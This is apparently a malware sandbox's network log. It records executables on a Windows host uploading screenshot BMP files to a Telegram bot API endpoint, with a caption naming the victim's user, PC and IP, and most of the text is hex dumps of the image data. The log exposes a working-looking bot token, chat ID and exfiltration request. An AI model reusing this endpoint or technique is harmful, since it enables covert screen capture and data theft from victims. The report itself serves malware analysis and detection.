00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotFhXCvNZd.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:29:04 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:04 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:07 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49938	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:29:05 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 49 4f 47 54 79 75 49 74 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotIOGTyuIt.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:29:05 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:05 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:09 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49949	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
